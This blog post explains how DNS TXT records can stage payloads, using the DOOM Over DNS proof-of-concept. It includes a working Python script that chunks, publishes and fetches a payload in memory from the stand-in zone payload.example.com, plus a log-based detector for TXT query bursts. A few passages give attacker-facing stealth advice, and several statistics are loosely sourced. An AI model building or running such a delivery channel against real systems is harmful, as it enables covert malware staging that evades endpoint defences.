Serverless key-value stores: exploiting DNS TXT data

Blog 11 min read

Storing roughly 2,000 characters per record turns the global DNS infrastructure into a free, serverless key-value store. You will learn how threat actors exploit the lack of validation in TXT fields to stash Base64-encoded payloads, examine the architecture behind fetching entire programs without writing to disk, and see a proof-of-concept executing Managed DOOM entirely through memory streams.

The rise of encrypted DNS complicates this environment further. As Digitrendz reports, the surging adoption of DNS over HTTPS and DNS over TLS forces organizations to rethink monitoring strategies, yet few inspect the contents of the TXT records their clients retrieve. Classic tunneling scripts push data upstream inside query names, where each label is capped at 63 octets and a whole name at 255, so they split data into small chunks; campaigns of the kind described here move data downstream in TXT answers instead, reportedly pushing around 300 characters of encoded binary per query and, in this proof-of-concept, close to 2,000. The name being resolved can look as innocent as grandmas-cookie-recipes.com while its answers deliver malware.

This technique is trivially easy to set up because DNS remains one of the oldest and most trusted protocols on the internet: outbound port 53 is permitted almost everywhere. By treating public DNS zones as globally distributed storage, attackers can reassemble files at runtime, leaving no artifacts on the host filesystem.

The Role of DNS TXT Records as a Serverless Key-Value Store

DNS TXT Records as Arbitrary Text Fields for Payload Storage

TXT records carry free-form text that authoritative servers do not validate. On the wire a TXT RDATA is a sequence of character-strings of at most 255 octets each (RFC 1035); hosting providers cap the total per record, and the zone used in this proof-of-concept held roughly 2,000 characters per entry. That property lets attackers treat the global DNS infrastructure as a serverless key-value store for payload staging. Instead of downloading a binary over HTTP, the malware agent queries a series of names and retrieves Base64-encoded chunks, which are reassembled entirely in memory, so disk-based forensic tooling never sees a file and few monitoring stacks retain or inspect the contents of TXT answers. Approximately 90% of modern malware uses DNS at some point in its lifecycle, yet security stacks often ignore this vector because DNS traffic is assumed to be legitimate.

Standard tunneling tools often limit chunks to the 63 octets a single label can hold; this deployment instead filled each TXT record to the roughly 2,000-character cap to minimize query volume. An answer that large does not fit the classic 512-byte UDP DNS message, so the resolver path must negotiate EDNS0 or fall back to TCP, which is itself an observable trait. Caching is the other dependency: every chunk is served through recursive resolvers the attacker does not control, and a stale or evicted answer mid-reassembly corrupts the buffer, so the agent has to verify the result before loading it. Unlike traditional malware that drops an executable to disk, this method leaves no forensic artifact on the host drive, leaving EDR file-scan heuristics nothing to hash; defenders have to look at the query stream and at the entropy of TXT answers instead. TXT is the natural choice because A and AAAA records are restricted to 4- and 16-byte addresses, while TXT carries arbitrary text. Capacity is still finite: storing a 1 GB MP4 this way would take an estimated 670,000 TXT records, an operational burden that makes the approach impractical for large media even though nothing in the protocol forbids it.

| Feature | TXT record | A record |
| --- | --- | --- |
| Payload type | Arbitrary text | IPv4 address only |
| Max data | ~2,000 chars per record (provider cap) | 4 bytes |
| Detection risk | Low visibility | High baseline noise |

Security teams often overlook the historic contents of text fields during forensic analysis. This blind spot allows nuisance malware to act as a pilot for costlier threats if initial delivery goes undetected. Should operators use DNS for payload delivery? Only if the need for stealth outweighs the operational cost: global caching they do not control, and the risk that fragments go missing mid-reassembly.

In-Memory .NET Managed Code Execution

Managed code execution bypasses disk I/O by handing raw bytes to the CLR, which loads them from a memory buffer. This mechanism allows an agent to reconstruct a binary from sequential queries rather than downloading a single executable file. The process shifts the attack surface from file system scanners to network traffic analysis, because the payload exists only as transient memory streams.

  1. The agent queries the attacker domain for encoded text fragments.
  2. Scripts decode the chunks and concatenate them into a byte array.
  3. The runtime reflects the assembly from this buffer without creating disk artifacts.

This approach exploits the ability of .NET assemblies to be loaded from a byte array (System.Reflection.Assembly.Load), a feature native executables lack: the Windows loader expects a file on disk.

Resolving 1,966 sequential TXT queries takes 10 to 20 seconds before the PowerShell agent can concatenate the Base64 chunks. The reconstruction loop iterates through numbered subdomains, retrieves each text fragment, decodes it, and appends the result to an expanding byte array. The aggregation happens entirely within the script's memory space, with no interaction with the file system; the agent then passes the completed buffer directly to the .NET runtime loader.
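The three-step procedure above, as an added example written for this page rather than code from the DOOM Over DNS project. It shows both sides of the channel: the publisher compresses and Base64-encodes a payload, splits it into numbered TXT records under an assumed staging zone `payload.example.com` with an assumed 2,000-character cap, and wire-encodes each record as RFC 1035 character-strings; the agent walks the names, joins the strings, accumulates the chunks in a bytearray and verifies a SHA-256 manifest before using the result. The zone is an in-memory dict standing in for a real authoritative server, the sample payload is constructed, and the final hand-off to Assembly.Load is replaced by returning the verified bytes.

```python
import base64
import hashlib
import zlib

RECORD_CHARS = 2000                     # assumed per-record cap at the hosting provider
BASE_DOMAIN = "payload.example.com"     # assumed staging zone (not a real domain)


def encode_txt_rdata(text: str) -> bytes:
    # RFC 1035 TXT RDATA: one or more <character-string>s, each a one-octet
    # length followed by at most 255 octets. A 2,000-char record needs eight.
    data = text.encode("ascii")
    out = bytearray()
    for i in range(0, len(data), 255):
        piece = data[i:i + 255]
        out.append(len(piece))
        out.extend(piece)
    return bytes(out)


def decode_txt_rdata(rdata: bytes) -> str:
    # Resolver side: strip the length octets and join the strings back together.
    parts, pos = [], 0
    while pos < len(rdata):
        n = rdata[pos]
        parts.append(rdata[pos + 1:pos + 1 + n])
        pos += 1 + n
    return b"".join(parts).decode("ascii")


def stage_zone(payload: bytes) -> dict:
    # Publisher side: compress, Base64, split into numbered TXT records.
    # Record 0 carries the chunk count and a SHA-256 so the agent can detect
    # a stale, missing or truncated chunk before loading anything.
    blob = base64.b64encode(zlib.compress(payload, 9)).decode("ascii")
    chunks = [blob[i:i + RECORD_CHARS] for i in range(0, len(blob), RECORD_CHARS)]
    manifest = f"{len(chunks)}:{hashlib.sha256(payload).hexdigest()}"
    zone = {f"0.{BASE_DOMAIN}": encode_txt_rdata(manifest)}
    for idx, chunk in enumerate(chunks, start=1):
        zone[f"{idx}.{BASE_DOMAIN}"] = encode_txt_rdata(chunk)
    return zone


def fetch_in_memory(resolve) -> bytes:
    # Agent side: resolve(name) returns the TXT RDATA for a name (a real agent
    # would call Resolve-DnsName or dig). Fragments accumulate in a bytearray;
    # nothing touches disk. The PoC hands the buffer to Assembly.Load; here the
    # verified bytes are simply returned.
    count, digest = decode_txt_rdata(resolve(f"0.{BASE_DOMAIN}")).split(":")
    buf = bytearray()
    for idx in range(1, int(count) + 1):
        buf.extend(decode_txt_rdata(resolve(f"{idx}.{BASE_DOMAIN}")).encode("ascii"))
    try:
        payload = zlib.decompress(base64.b64decode(bytes(buf), validate=True))
    except (ValueError, zlib.error) as exc:   # binascii.Error is a ValueError
        raise ValueError(f"reassembly failed: {exc}") from None
    if hashlib.sha256(payload).hexdigest() != digest:
        raise ValueError("reassembly failed: SHA-256 mismatch (stale or missing chunk)")
    return payload


def records_needed(size_bytes: int) -> int:
    # Records an incompressible blob of size_bytes occupies at this cap.
    b64_len = 4 * ((size_bytes + 2) // 3)
    return -(-b64_len // RECORD_CHARS)


if __name__ == "__main__":
    sample = bytes(range(256)) * 200          # constructed stand-in for an assembly
    zone = stage_zone(sample)
    print(f"staged {len(zone) - 1} TXT records under {BASE_DOMAIN}")
    assert fetch_in_memory(lambda name: zone[name]) == sample
    print(f"1 GB would need about {records_needed(10**9):,} records")
```

The manifest record is the caveat the page raises about resolver caching: without a count and a digest, a chunk that expired from one cache and was refreshed from a modified zone would be concatenated silently and the loader would crash on garbage, or worse, run it. `records_needed(10**9)` reproduces the page's estimate of roughly 670,000 records for a 1 GB file.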

Operators choose memory-only execution to evade endpoint detection, not network filtering: the agent still has to query the staging domain hundreds or thousands of times, so the activity is visible on the wire even though nothing is written to disk. This marks a broader shift from downloading one malicious file to assembling malware from many innocuous-looking DNS answers. Hexadecimal rather than Base64 encoding is the more common choice in the wild, appearing in roughly 95% of such DNS attacks, and real agents are typically compiled in C or Go rather than scripted in PowerShell as this proof-of-concept was. The limitation is that high-volume query patterns can trigger network anomaly alerts even when file scanners remain blind.

Managed-DOOM as a Pure C# Engine for Memory Execution

Adam Rice selected managed-doom because a pure C# assembly can be loaded from raw bytes, bypassing disk I/O entirely. Native executables need a file on disk, but the .NET runtime accepts a byte array (a MemoryStream drained into one) via reflection. This architectural distinction lets the DOOM Over DNS project execute a complex program without writing a single byte to storage. The original engine code had to be patched to replace file-path arguments with in-memory buffers, and every native DLL dependency had to go: Assembly.Load handles managed code only, and the standard Windows loader cannot load an unmanaged DLL from a memory buffer.

| Component | Traditional load | Memory load |
| --- | --- | --- |
| Entry point | Disk file path | Byte array |
| Dependency | Native DLLs | Managed assemblies only |
| Forensic trace | MFT entries | Volatile RAM only |

Operators must recompile targets so that no native dependency remains in the binary. The write-up confirms that the windowing libraries were replaced with direct Win32 API calls to satisfy this constraint. The cost is functionality: stripping audio and native wrappers trades fidelity for stealth. Security teams monitoring file-creation events will see nothing, which shifts detection onto network flow analysis.

A roughly 250-line PowerShell script issues nearly 2,000 DNS queries to reconstruct the game engine entirely within RAM. The agent iterates through sequential subdomains, decodes each text fragment and appends it to an expanding byte array before invoking the .NET loader, turning ordinary-looking DNS traffic into a reassembly mechanism. On the staging side, the WAD shrank from 4MB to 1.7MB and the DLL bundle from 4.4MB to 1.2MB under compression, and uploading the resulting records through the Cloudflare API consumed roughly 15 minutes of administrative time. The execution flow relies on patching the source to read from a memory stream rather than a disk path such as `C:\Path\to\Game.dll`, and on stripping native dependencies so the managed-doom port runs as pure managed code that never needs a file on disk. This DOOM Over DNS implementation proves that a complex binary can launch without a single byte touching storage, but the need to remove audio and native windowing libraries limits the fidelity of executables deployed through this vector. Defenders face a matching dilemma: blocking large TXT answers disrupts legitimate SPF, DKIM and DMARC records alongside malicious payloads.

Hosting the 1,966 TXT records required for this proof-of-concept demands a Cloudflare Pro DNS zone rather than the free tier. The author committed $20/month to avoid buying ten separate domains just to stay under the free tier's per-zone record limit. This financial barrier creates a tangible threshold for attackers, shifting operations from zero-cost experiments to funded campaigns. Latency introduces a second constraint: resolving thousands of queries takes 10 to 20 seconds before execution begins, which makes the technique impractical for time-sensitive malware stages that need an instant callback.

| Constraint type | Free tier | Pro tier |
| --- | --- | --- |
| Record count | Too low to hold 1,966 records in one zone | Sufficient for this payload |
| Monthly cost | Free | $20/month |
| Operational risk | High (ten domains to manage) | Low (single zone) |

Network defenders should recognize that running DOOM over DNS is an economic exercise as much as a technical one. The need for paid infrastructure filters out low-sophistication actors while leaving the channel available to well-funded groups for sustained, large-scale payload delivery or exfiltration.

RFC 1035 Design Intent Versus Modern DNS Tunneling Reality

RFC 1035 specified a name-resolution protocol, not a storage array, and attackers now exploit that mismatch. The IETF published it in 1987, nearly four decades ago, without anticipating binary payloads in text fields, and the gap lets threat actors treat DNS zones as distributed file systems. The Iranian APT group OilRig ran DNS-based command and control, including TXT-record tunneling, across multiple campaigns. Modern malware frequently adopts hexadecimal encoding to fit binary data into standard label and record constraints; researchers observed the Joke Screenmate malware staged with exactly this fragmentation technique in 2025 to evade signature scans. Traditional security stacks miss these payloads because they inspect files, not query streams, and the cost of that blind spot is total loss of visibility into memory-resident threats. Operators must shift focus from disk artifacts to query and answer analysis; ignoring this vector leaves networks open to serverless payload delivery that passes through any firewall rule permitting outbound DNS.

This operational shift prioritized TXT records over standard HTTP beacons to evade perimeter inspection tools. The SUNBURST backdoor later adopted similar stealth mechanics during the 2020 SolarWinds compromise, embedding its initial C2 exchange within legitimate-looking query streams. Such campaigns demonstrate that DNS tunneling functions as a reliable transport layer for state-sponsored espionage.

| Campaign | Primary vector | Detection window |
| --- | --- | --- |
| OilRig | TXT tunneling | Multi-year |
| SUNBURST | DNS C2 | Months |
| DNSpionage | Registrar hijack | Months |

The DNSpionage campaign further illustrated this endurance by compromising registrar accounts for extended periods before discovery. Attackers increasingly favor this method because traditional antivirus solutions often ignore DNS payload assembly. A key tension exists between network performance monitoring and deep packet inspection; blocking large TXT responses risks breaking legitimate email authentication flows. Security teams must recognize that payload delivery via DNS bypasses standard file-based heuristics entirely. The evolution from simple exfiltration to complex binary staging represents a fundamental change in threat modeling. Operators should assume that any allowed DNS traffic could carry executable code segments.

Can defenders keep treating DNS as benign infrastructure? Only if they accept that standard monitoring will miss this activity. The strategic implication demands a shift from file hashing to behavioral analysis of query patterns. InterLIR recommends auditing DNS zone traffic for high-volume TXT requests rather than waiting for disk writes.

About

Alexei Krylov serves as the Head of Sales at InterLIR, a specialized IPv4 marketplace dedicated to secure network resource redistribution. While his primary focus involves B2B sales and managing Regional Internet Registry relationships, his deep immersion in network infrastructure provides unique insight into DNS TXT record exploitation. At InterLIR, ensuring IP reputation and clean BGP routes is critical; understanding how attackers hide malicious payloads within arbitrary text fields directly supports these security objectives. Krylov's daily work analyzing IP assets reveals how easily compromised domains can undermine network integrity, making him uniquely qualified to discuss the forensic blind spots of DNS payloads. By connecting practical cybersecurity consulting with InterLIR's mission of transparent, safe IP allocation, he highlights the urgent need for vigilance against trivial yet dangerous techniques like stashing code in TXT records to protect global network availability.

Conclusion

Scaling this attack vector breaks traditional perimeter defenses because query volume becomes the only reliable indicator, not content signatures. As attackers optimize compression algorithms, the number of required requests will drop, making statistical anomalies harder to distinguish from legitimate bulk email authentication checks. The ongoing operational cost involves maintaining high-fidelity DNS telemetry pipelines that can correlate disparate queries in real-time without introducing unacceptable latency. Organizations relying solely on endpoint agents will face increasing gaps as in-memory reconstruction techniques evolve to bypass disk monitors entirely.

Security leaders must mandate behavioral baselining for TXT record requests within the next quarter, specifically targeting non-email infrastructure. Do not wait for a confirmed breach to implement these controls; the window for passive observation is closing as tooling becomes commoditized. Prioritize visibility into query frequency and response size variance over payload inspection, which fails against encrypted tunnels. This shift requires treating DNS as an execution layer rather than a simple resolution service.

Start by exporting your DNS resolver logs from the past 48 hours and filtering for any single client requesting more than 50 TXT records within a ten-minute window. Investigate these specific patterns immediately to establish your current exposure baseline before deploying automated thresholds.
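The starting baseline described above, as an added example that is not part of the original post: a sliding-window check over exported resolver logs that flags any client issuing more than 50 TXT queries inside ten minutes, then summarises what it asked for (peak rate, numbered-label pattern, dominant domain, mean answer size). The log format and every line in `constructed_log()` are constructed for the example; the regex is the only thing to adapt to your resolver's querylog, and the two-label `base_domain()` approximation is an assumption to replace with a public-suffix list in production.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import re

THRESHOLD = 50                  # more than this many TXT queries ...
WINDOW = timedelta(minutes=10)  # ... inside any sliding window this long

# Constructed log format for this example: ISO-8601 UTC timestamp, client
# address, query type, query name and answer size in bytes. Adapt LINE_RE to
# whatever your resolver (BIND querylog, Unbound, dnsmasq, Windows DNS) emits.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) client=(?P<client>\S+) qtype=(?P<qtype>\S+) "
    r"qname=(?P<qname>\S+) rsize=(?P<rsize>\d+)$"
)


def parse_line(line: str):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
    rec["rsize"] = int(rec["rsize"])
    return rec


def base_domain(qname: str, labels: int = 2) -> str:
    # Registrable-domain approximation: keep the last two labels. Assumption
    # for the example; use a public-suffix list in production.
    return ".".join(qname.rstrip(".").split(".")[-labels:])


def find_txt_bursts(lines, threshold=THRESHOLD, window=WINDOW) -> dict:
    """Return {client: summary} for every client whose TXT query count inside
    any sliding window exceeds threshold. Lines need not be ordered."""
    per_client = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        if rec["qtype"] == "TXT":
            per_client[rec["client"]].append(rec)

    hits = {}
    for client, recs in per_client.items():
        recs.sort(key=lambda r: r["ts"])
        peak, start = 0, 0
        for end, rec in enumerate(recs):            # two-pointer sliding window
            while rec["ts"] - recs[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak <= threshold:
            continue
        by_domain = defaultdict(int)
        for r in recs:
            by_domain[base_domain(r["qname"])] += 1
        # Numbered leftmost labels (1.payload..., 2.payload...) are the
        # sequential-chunk pattern a reassembly agent produces.
        numbered = sum(r["qname"].split(".")[0].isdigit() for r in recs)
        hits[client] = {
            "peak_in_window": peak,
            "total_txt": len(recs),
            "numbered_labels": numbered,
            "top_domain": max(by_domain, key=by_domain.get),
            "mean_rsize": round(sum(r["rsize"] for r in recs) / len(recs)),
        }
    return hits


def constructed_log() -> list:
    # Constructed sample: one mail host doing routine SPF/DKIM/DMARC lookups and
    # one workstation pulling 60 numbered chunks in five minutes.
    t0 = datetime(2025, 1, 1, 10, 0, 0)

    def stamp(seconds):
        return (t0 + timedelta(seconds=seconds)).isoformat() + "Z"

    benign = ["_dmarc.partner.example", "s1._domainkey.partner.example", "partner.example"]
    lines = [f"{stamp(30 * i)} client=10.0.0.7 qtype=TXT qname={n} rsize=97"
             for i, n in enumerate(benign)]
    lines += [f"{stamp(5 * i)} client=10.0.0.23 qtype=TXT "
              f"qname={i}.payload.example.com rsize=2011" for i in range(1, 61)]
    lines.append(f"{stamp(0)} client=10.0.0.23 qtype=A qname=www.example.com rsize=60")
    return lines


if __name__ == "__main__":
    for client, summary in find_txt_bursts(constructed_log()).items():
        print(client, summary)
```

Mail gateways and anti-spam filters legitimately resolve many TXT records, which is the email-authentication collision the page warns about; baseline those hosts separately rather than raising the global threshold, and treat a high `numbered_labels` count concentrated on one `top_domain` with uniformly large answers as the signature worth escalating.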

Frequently Asked Questions

Executing the game requires distributing the payload across exactly 1,966 unique TXT records. This specific count allows the 2.9MB compressed file to be reassembled in RAM without writing anything to the disk.

The entire compressed payload required for execution totals roughly 2.9MB: a 1.7MB compressed WAD (the game data) plus a 1.2MB compressed DLL bundle, split into discrete DNS entries.

The original uncompressed files consist of a 4MB WAD and a 4.4MB DLL bundle. These components total 8.4MB before being compressed down to 2.9MB for DNS storage.

Storing a 1GB MP4 file would require an estimated 670,000 TXT records spread across hundreds of domains. This massive scale makes the approach unfeasible for large media compared to smaller binaries.

Approximately 90% of modern malware utilizes DNS during its operational lifecycle to communicate or fetch data. Despite this high usage, many security stacks ignore TXT records due to perceived legitimacy.